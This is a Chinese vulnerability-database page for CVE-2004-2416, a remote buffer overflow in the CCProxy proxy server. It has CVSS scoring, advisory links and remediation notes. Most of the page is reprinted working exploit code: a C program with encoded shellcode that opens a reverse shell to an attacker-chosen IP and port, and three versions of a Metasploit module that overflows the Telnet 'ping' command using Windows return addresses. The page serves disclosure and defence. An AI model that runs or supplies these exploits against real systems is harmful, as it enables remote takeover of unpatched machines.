CVE-2004-2416
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:04
NMCOEPS    

[原文]Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]Youngzsoft CCProxy登录函数未明远程缓冲区溢出漏洞(CNNVD-200412-343)

        CCProxy登录组件存在缓冲区溢出漏洞。远程攻击者可以借助超长GET请求执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2416
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2416
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-343
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/13085
(VENDOR_ADVISORY)  SECUNIA  13085
http://xforce.iss.net/xforce/xfdb/18012
(UNKNOWN)  XF  proxy-server-ccproxy-bo(18012)
http://www.securityfocus.com/bid/11666
(UNKNOWN)  BID  11666
http://www.securiteam.com/exploits/6E0032KBPM.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6E0032KBPM.html
http://www.osvdb.org/11593
(UNKNOWN)  OSVDB  11593
http://securitytracker.com/id?1012189
(UNKNOWN)  SECTRACK  1012189

- 漏洞信息

Youngzsoft CCProxy登录函数未明远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        CCProxy登录组件存在缓冲区溢出漏洞。远程攻击者可以借助超长GET请求执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 漏洞信息 (619)

CCProxy Log Remote Stack Overflow Exploit (EDBID:619)
windows remote
2004-11-09 Verified
808 Ruder
N/A [点击下载]
#include <stdio.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")


unsigned char EndChar[]=
"x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A";
// HTTP/1.0

unsigned char shellcode[] =
"xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05"

"xe8xedxffxffxff"

/* 254 bytes shellcode, xor with 0xee */
/* offset 92=IP offset 99=PORT*/
"x07x36xeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"

"x9exf2x43x65x86xe6x65x19x84xeaxb7x06x96xeexeexee"

"x0cx17x86xddxdcxeexeex86x99x9dxdcxb1xbax11xf8x7b"

"x84xedxb7x06x8exeexeexeex0cx17xbfxbfxbfxbfx84xef"

"x84xecx11xb8xfex7dx86x91xeexeexefx86xecxeexeexdb"

"x65x02x84xfexbbxbdx11xb8xfax6bx2ex9bxd6x65x12x84"

"xfcxb7x45x0cx13x88x29xaaxcaxd2xefxefx7dx45x45x45"

"x65x12x86x8dx83x8axeex65x02xbex63xa9xfexb9xbexbf"

"xbfxbfx84xefxbfxbfxbbxbfx11xb8xeax84x11x11xd9x11"

"xb8xe2x11xb8xf6x11xb8xe6xbfxb8x65x9bxd2x65x9axc0"

"x96xedx1bxb8x65x98xcexedx1bxddx27xa7xafx43xedx2b"

"xddx35xe1x50xfexd4x38x9axe6x2fx25xe3xedx34xaex05"

"x1fxd5xf1x9bx09xb0x65xb0xcaxedx33x88x65xe2xa5x65"

"xb0xf2xedx33x65xeax65xedx2bx45xb0xb7x2dx06xcdx11"

"x11x11x60xa0xe0x02x9cx10x5dxf8x01x20x0ex8ex43x37"

"xebx20x37xe7x1bx43x02x17x44x8ex09x97x28x97";

/*

+------------------------------------------------------------------------------+
| |inc edx...inc edx|shellcode|0x7ffa54cd| | |
+------------------------------------------------------------------------------+
      +0x42 +shellcode +IPLen( IP )=4065

    :
mov ecx,0x12811111
shr ecx,0x14
sub esp,ecx
jmp esp

                        
1.
2. ecx inc edx
*/

void start(void)
{
printf("CCProxy Log Stack Overflow Exploit!n");
printf("written by Ruder 11/2004n");
printf("Bug found by Isno,See xfocus.comn");
printf("Homepage:http://ruder.cdut.netn";);
printf("E-mail:cocoruder@163.comn");
}

int main(int argc, char *argv[])
{
WSADATA wsd;
SOCKET sClient;
int ret, i,tmp;
struct sockaddr_in server,local;
struct hostent *host = NULL;
int IPLen;
int a;
char buff[4096] = {0};
char *IPStr;
u_short tmp1;
char *PORTStr;

start();

if(argc != 5)
{
printf("usage: %s target port backIP backPortn", argv[0]);
exit(1);
}

if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
printf("Failed to load Winsock library!n");
return 1;
}

sClient = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sClient == INVALID_SOCKET)
{
printf("socket() failed: %dn", WSAGetLastError());
return 1;
}

// shellcode ,
tmp=inet_addr(argv[3]);
a=(DWORD)&tmp; //
IPStr=(char*)a;

shellcode[92]=IPStr[0]^0xee; //IP
shellcode[93]=IPStr[1]^0xee;
shellcode[94]=IPStr[2]^0xee;
shellcode[95]=IPStr[3]^0xee;

tmp1=htons((u_short)atoi(argv[4]));
a=(DWORD)&tmp1;
PORTStr=(char*)a;

shellcode[99]=PORTStr[0]^0xee; //PORT
shellcode[100]=PORTStr[1]^0xee;

server.sin_family = AF_INET;
server.sin_port = htons((u_short)atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if (server.sin_addr.s_addr == INADDR_NONE)
{
host = gethostbyname(argv[1]);
if (host == NULL)
{
printf("Unable to resolve server: %sn", argv[1]);
return 1;
}
CopyMemory(&server.sin_addr, host->h_addr_list[0], host->h_length);
}

//
if (connect(sClient, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
{
printf("connect() failed: %dn", WSAGetLastError());
return 1;
}

//
a=sizeof(sockaddr_in);

// IP
if (getsockname(sClient,(struct sockaddr *)&local,&a)==SOCKET_ERROR)
{
printf("getsockname() failed: %dn", WSAGetLastError());
return 1;
}
IPLen=strlen(inet_ntoa(local.sin_addr));


//
buff[0]=0x47;
buff[1]=0x45;
buff[2]=0x54;
buff[3]=0x20;
buff[4]=0x2F;

// INC EDX
// 0x42
tmp=4065-sizeof(shellcode)-5-IPLen+1;
for(i=5;i<tmp+5;i++)
{
buff[i]=0x42;
}

CopyMemory(&buff[i],shellcode,sizeof(shellcode));
i=i+sizeof(shellcode)-1;

buff[i]=0xCD;
buff[i+1]=0x54;
buff[i+2]=0xFA;
buff[i+3]=0x7F;

i=i+4;
//
buff[i++]=0xB9;
buff[i++]=0x11;
buff[i++]=0x11;
buff[i++]=0x81;
buff[i++]=0x12;
buff[i++]=0xC1;
buff[i++]=0xE9;
buff[i++]=0x14;
buff[i++]=0x2B;
buff[i++]=0xE1;
buff[i++]=0xFF;
buff[i++]=0xE4;

//
CopyMemory(&buff[i],EndChar,sizeof(EndChar));
i=i+sizeof(EndChar);

ret=send(sClient,buff,i-1,0);

printf("send... buffer ok!good luck!n");

closesocket(sClient);
WSACleanup();
return 0;
}

// milw0rm.com [2004-11-09]
		

- 漏洞信息 (16689)

CCProxy <= v6.2 Telnet Proxy Ping Overflow (EDBID:16689)
windows remote
2010-04-30 Verified
23 metasploit
N/A [点击下载]
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
					This module exploits the YoungZSoft CCProxy <= v6.2 suite
				Telnet service. The stack is overwritten when sending an overly
				long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9179 $',
			'References'    =>
				[
					[ 'CVE', '2004-2416' ],
					[ 'OSVDB', '11593' ],
					[ 'BID', '11666 ' ],
					[ 'URL', 'http://milw0rm.com/exploits/621' ],
				],
			'Privileged'		=> false,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload' =>
				{
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
				},
			'Platform' => ['win'],
			'Targets' =>
				[
					# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
					[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
					[ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
				],
			'DisclosureDate' => 'Nov 11 2004'))

		register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83074)

CCProxy <= v6.2 Telnet Proxy Ping Overflow (PacketStormID:F83074)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit
CVE-2004-2416
[点击下载]

This Metasploit module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
            			This module exploits the YoungZSoft CCProxy <= v6.2 suite
            			Telnet service. The stack is overwritten when sending an overly
            			long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2004-2416' ],
				[ 'OSVDB', '11593' ],
				[ 'BID', '11666 ' ],
				[ 'URL', 'http://milw0rm.com/exploits/621' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
				# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
				[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
				[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
				[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
				[ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
			],
			'DisclosureDate' => 'Nov 11 2004'))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check 
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears 
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
    

- 漏洞信息 (F59050)

ccproxy-meta.txt (PacketStormID:F59050)
2007-09-05 00:00:00
Patrick Webster  
exploit
CVE-2004-2416
[点击下载]

This Metasploit module exploits the YoungZSoft CCProxy suite versions 6.2 and below Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/ 
##

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
	
	include Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
            			This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
				The stack is overwritten when sending an overly long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'BID', '11666 ' ],
				[ 'CVE', '2004-2416' ],
				[ 'MIL', '621' ],
				[ 'OSVDB', '11593' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
			# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[
				'Windows 2000 Pro All - English',
				{
					'Ret'	=> 0x75023411, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - Italian',
				{
					'Ret'	=> 0x74fd2b81, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - French',
				{
					'Ret'	=> 0x74fa2b22, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP0/1 - English',
				{
					'Ret'	=> 0x71aa1a97, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP2 - English',
				{
					'Ret'	=> 0x71aa1b22, # call esi ws2help.dll
				}
				],
			],
			'DisclosureDate' => 'Nov 11 2004'))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check 
		connect
		banner = sock.get_once(-1,3)

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
end

    

- 漏洞信息

11593
CCProxy Logging Component HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in CCProxy. The logging component fails to validate user-supplied GET requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-11-05 Unknow
2004-11-05 Unknow

- 解决方案

Upgrade to version 6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Youngzsoft CCProxy Logging Function Unspecified Remote Buffer Overflow Vulnerability
Boundary Condition Error 11666
Yes No
2004-11-11 12:00:00 2007-09-05 06:51:00
Discovery is credited to Isno.

- 受影响的程序版本

Youngzsoft CCProxy 6.0

- 漏洞讨论

CCProxy is reported prone to an unspecified remote buffer-overflow vulnerability. Exploiting this issue may allow remote attackers to execute arbitrary code on a vulnerable computer and gain unauthorized access.

All versions of CCProxy are considered vulnerable at this time.

- 漏洞利用

Exploit code as well as a Metasploit module are available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站